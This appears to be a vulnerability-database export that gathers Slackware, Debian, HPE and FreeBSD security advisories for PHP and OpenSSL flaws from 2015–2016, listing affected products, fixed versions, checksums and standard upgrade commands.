ChangeLog:\n+--------------------------+\npatches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n5e8d107dba11f8c87693edfdc32f56b7 php-5.4.41-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n24d6895fe6b0e9c88b04ceaccc35383d php-5.4.41-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n52011eec3a256a365789562b63e8ba84 php-5.4.41-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n82b75af6253121cab6cc84dd714f554c php-5.4.41-x86_64-1_slack14.1.txz\n\nSlackware -current package:\ne1c64f133f44b0abac21e0846e39d3c8 n/php-5.6.9-i586-1.txz\n\nSlackware x86_64 -current package:\nae51c99af34a4bd8721e7140c38a8c1a n/php-5.6.9-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg php-5.4.41-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n# /etc/rc.d/rc.httpd stop\n# /etc/rc.d/rc.httpd start\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nCVE-2015-4024\n\n Denial of service when processing multipart/form-data requests. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.41-0+deb7u1. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.9+dfsg-0+deb8u1. \n\nFor the testing distribution (stretch), these problems have been fixed\nin version 5.6.9+dfsg-1. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 5.6.9+dfsg-1. \n\nWe recommend that you upgrade your php5 packages",
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{
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VAR-201605-0079
Vulnerability from variot - Updated: 2026-04-10 22:13The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding. OpenSSL is prone to a local denial-of-service vulnerability. An attacker may exploit this issue to crash the application or consume excessive amount of data, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03756en_us
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: hpesbhf03756en_us Version: 1
HPESBHF03756 rev.1 - HPE Network Products including Comware 7, iMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-06-05 Last Updated: 2017-06-05
Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed for HPE network products including Comware 7, iMC, and VCX. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS) or disclosure of sensitive information.
References:
- CVE-2016-2105 - Remote Denial of Service (DoS)
- CVE-2016-2106 - Remote Denial of Service (DoS)
- CVE-2016-2107 - Remote disclosure of sensitive information
- CVE-2016-2108 - Remote Denial of Service (DoS)
- CVE-2016-2109 - Remote Denial of Service (DoS)
- CVE-2016-2176 - Remote Denial of Service (DoS)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- Comware v7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- HP Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2016-2105
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2106
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2016-2107
3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CVE-2016-2108
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-2109
7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CVE-2016-2176
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L
6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following software updates available to resolve the vulnerabilities in the Comware 7, iMC and VCX products running OpenSSL.
COMWARE 7 Products
- 12500 (Comware 7) - Version: R7377P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 10500 (Comware 7) - Version: R7184
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5900/5920 (Comware 7) - Version: R2422P02
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR1000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR2000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR3000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- MSR4000 (Comware 7) - Version: R0306P52
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- VSR (Comware 7) - Version: E0324
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7900 (Comware 7) - Version: R2152
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130 (Comware 7) - Version: R3115
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6125XLG - Version: R2422P02
- HP Network Products
- 711307-B21 HP 6125XLG Blade Switch
- 737230-B21 HP 6125XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 6127XLG - Version: R2422P02
- HP Network Products
- 787635-B21 HP 6127XLG Blade Switch Opt Kit
- 787635-B22 HP 6127XLG Blade Switch with TAA
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- Moonshot - Version: R2432
- HP Network Products
- 786617-B21 - HP Moonshot-45Gc Switch Module
- 704654-B21 - HP Moonshot-45XGc Switch Module
- 786619-B21 - HP Moonshot-180XGc Switch Module
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5700 (Comware 7) - Version: R2422P02
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5930 (Comware 7) - Version: R2422P02
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 1950 (Comware 7) - Version: R3115
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 7500 (Comware 7) - Version: R7184
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5510HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5130HI (Comware 7) - Version: R1120P10
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5940 - Version: R2509
- HP Network Products
- JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch
- JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch
- JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch
- JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch
- JH396A HPE FlexFabric 5940 32QSFP+ Switch
- JH397A HPE FlexFabric 5940 2-slot Switch
- JH398A HPE FlexFabric 5940 4-slot Switch
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
- 5950 - Version: R6123
- HP Network Products
- JH321A HPE FlexFabric 5950 32QSFP28 Switch
- JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch
- JH404A HPE FlexFabric 5950 4-slot Switch
- 12900E (Comware 7) - Version: R2609
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2107
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
iMC Products
- iNode PC 7.2 (E0410) - Version: 7.2 E0410
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
- iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
- CVEs
- CVE-2016-2106
- CVE-2016-2109
- CVE-2016-2176
VCX Products
- VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
- CVEs
- CVE-2016-2105
- CVE-2016-2106
- CVE-2016-2108
- CVE-2016-2109
- CVE-2016-2176
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.
HISTORY Version:1 (rev.1) - 2 June 2017 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
============================================================================= FreeBSD-SA-16:17.openssl Security Advisory The FreeBSD Project
Topic: Multiple OpenSSL vulnerabilities
Category: contrib Module: openssl Announced: 2016-05-04 Credits: OpenSSL Project Affects: All supported versions of FreeBSD. Corrected: 2016-05-03 18:54:20 UTC (stable/10, 10.3-STABLE) 2016-05-04 15:25:47 UTC (releng/10.3, 10.3-RELEASE-p2) 2016-05-04 15:26:23 UTC (releng/10.2, 10.2-RELEASE-p16) 2016-05-04 15:27:09 UTC (releng/10.1, 10.1-RELEASE-p33) 2016-05-04 06:53:02 UTC (stable/9, 9.3-STABLE) 2016-05-04 15:27:09 UTC (releng/9.3, 9.3-RELEASE-p41) CVE Name: CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2109, CVE-2016-2176
For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.
II. Problem Description
The padding check in AES-NI CBC MAC was rewritten to be in constant time by making sure that always the same bytes are read and compared against either the MAC or padding bytes. But it no longer checked that there was enough data to have both the MAC and padding bytes. [CVE-2016-2107]
An overflow can occur in the EVP_EncodeUpdate() function which is used for Base64 encoding of binary data. [CVE-2016-2105]
An overflow can occur in the EVP_EncryptUpdate() function, however it is believed that there can be no overflows in internal code due to this problem. [CVE-2016-2109]
ASN1 Strings that are over 1024 bytes can cause an overread in applications using the X509_NAME_oneline() function on EBCDIC systems. [CVE-2016-2176] FreeBSD does not run on any EBCDIC systems and therefore is not affected.
III. Impact
A MITM attacker can use a padding oracle attack to decrypt traffic when the connection uses an AES CBC cipher and the server support AES-NI. [CVE-2016-2107]
If an attacker is able to supply very large amounts of input data then a length check can overflow resulting in a heap corruption. [CVE-2016-2105]
Any application parsing untrusted data through d2i BIO functions are vulnerable to memory exhaustion attack. [CVE-2016-2109] TLS applications are not affected.
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
Restart all daemons that use the library, or reboot the system.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
Restart all daemons that use the library, or reboot the system.
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.x]
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-10.patch.asc
gpg --verify openssl-10.patch.asc
[FreeBSD 9.3]
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patc
fetch https://security.FreeBSD.org/patches/SA-16:17/openssl-9.patch.asc
gpg --verify openssl-9.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as described in .
Restart all daemons that use the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/9/ r299053 releng/9.3/ r299068 stable/10/ r298999 releng/10.1/ r299068 releng/10.2/ r299067 releng/10.3/ r299066
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. References
The latest revision of this advisory is available at -----BEGIN PGP SIGNATURE-----
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Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1t-i486-1_slack14.1.txz: Upgraded. This update fixes the following security issues: Memory corruption in the ASN.1 encoder (CVE-2016-2108) Padding oracle in AES-NI CBC MAC check (CVE-2016-2107) EVP_EncodeUpdate overflow (CVE-2016-2105) EVP_EncryptUpdate overflow (CVE-2016-2106) ASN.1 BIO excessive memory allocation (CVE-2016-2109) EBCDIC overread (CVE-2016-2176) For more information, see: https://www.openssl.org/news/secadv/20160503.txt http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2105 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2106 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2109 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2176 ( Security fix ) patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.1.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1t-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1t-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1t-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1t-x86_64-1_slack14.0.txz
